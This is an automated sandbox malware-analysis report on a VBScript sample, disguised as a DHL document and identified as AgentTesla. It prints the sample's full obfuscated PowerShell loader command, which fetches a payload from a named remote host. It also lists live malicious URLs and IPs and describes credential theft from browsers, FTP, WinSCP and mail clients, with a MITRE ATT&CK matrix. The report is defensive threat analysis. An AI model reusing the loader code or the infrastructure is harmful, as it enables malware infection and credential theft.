(posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvass
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen (posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvassJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen (posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvassJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000F.00000002.2971575193.00000000245EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 0000000F.00000002.2971575193.00000000245EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2971575193.00000000245C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts121
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		1
            Exfiltration Over Alternative Protocol            		Abuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		1
            Credentials in Registry            		25
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)1
            Software Packing            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput Capture23
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets141
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection            		DCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem11
            System Network Configuration Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430128 Sample: DHL_RF_20200712_BN_N0095673... Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 41 ftp.concaribe.com 2->41 43 concaribe.com 2->43 45 3 other IPs or domains 2->45 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for URL or domain 2->59 61 5 other signatures 2->61 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 75 VBScript performs obfuscated calls to suspicious functions 9->75 77 Suspicious powershell command line found 9->77 79 Wscript starts Powershell (via cmd or directly) 9->79 81 4 other signatures 9->81 12 powershell.exe 14 19 9->12         started        16 PING.EXE 1 9->16         started        18 cmd.exe 1 9->18         started        20 PING.EXE 1 9->20         started        process6 dnsIp7 51 mnajjar.de 148.163.99.20, 49731, 49738, 80 IOFLOODUS United States 12->51 83 Suspicious powershell command line found 12->83 85 Very long command line found 12->85 87 Found suspicious powershell code related to unpacking or dynamic code loading 12->87 22 powershell.exe 17 12->22         started        25 conhost.exe 12->25         started        27 cmd.exe 1 12->27         started        53 google.com 172.217.165.142 GOOGLEUS United States 16->53 29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        signatures8 process9 signatures10 71 Writes to foreign memory regions 22->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 22->73 35 wab.exe 15 8 22->35         started        39 cmd.exe 1 22->39         started        process11 dnsIp12 47 concaribe.com 192.185.13.234, 21, 49740 UNIFIEDLAYER-AS-1US United States 35->47 49 api.ipify.org 104.26.12.205, 443, 49739 CLOUDFLARENETUS United States 35->49 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 35->63 65 Tries to steal Mail credentials (via file / registry access) 35->65 67 Tries to harvest and steal ftp login credentials 35->67 69 Tries to harvest and steal browser information (history, passwords, etc) 35->69 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL_RF_20200712_BN_N0095673441.vbs23%VirustotalBrowse
            DHL_RF_20200712_BN_N0095673441.vbs21%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            concaribe.com3%VirustotalBrowse
            mnajjar.de0%VirustotalBrowse
            ftp.concaribe.com3%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://mnajjar.de0%VirustotalBrowse
            http://mnajjar.de/vsp1/Duplo.mso1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            google.com
            		172.217.165.142
            		truefalse
              		high
              api.ipify.org
              		104.26.12.205
              		truefalse
                		high
                concaribe.com
                		192.185.13.234
                		truetrueunknown
                mnajjar.de
                		148.163.99.20
                		truefalseunknown
                ftp.concaribe.com
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://api.ipify.org/false
                  		high
                  http://mnajjar.de/vsp/izoOgnnlVO233.binfalse
                    		unknown
                    http://mnajjar.de/vsp1/Duplo.msofalseunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://mnajjar.de/vsp1/Duplo.msoPpowershell.exe, 00000007.00000002.2461994719.000001B6C1867000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://mnajjar.de/vsp1/Duplo.msoXRpowershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          		unknown
                          http://mnajjar.depowershell.exe, 00000007.00000002.2461994719.000001B6C1867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2461994719.000001B6C2EFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2461994719.000001B6C33F0000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/pscore6lBdqpowershell.exe, 0000000A.00000002.2276635267.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://go.micropowershell.exe, 00000007.00000002.2461994719.000001B6C2852000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000007.00000002.2461994719.000001B6C1641000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2461994719.000001B6C1641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2276635267.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.26.12.205
                                      		api.ipify.orgUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      148.163.99.20
                                      		mnajjar.deUnited States
                                      		53755IOFLOODUSfalse
                                      172.217.165.142
                                      		google.comUnited States
                                      		15169GOOGLEUSfalse
                                      192.185.13.234
                                      		concaribe.comUnited States
                                      		46606UNIFIEDLAYER-AS-1UStrue

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1430128
                                      Start date and time:2024-04-23 08:02:54 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 29s
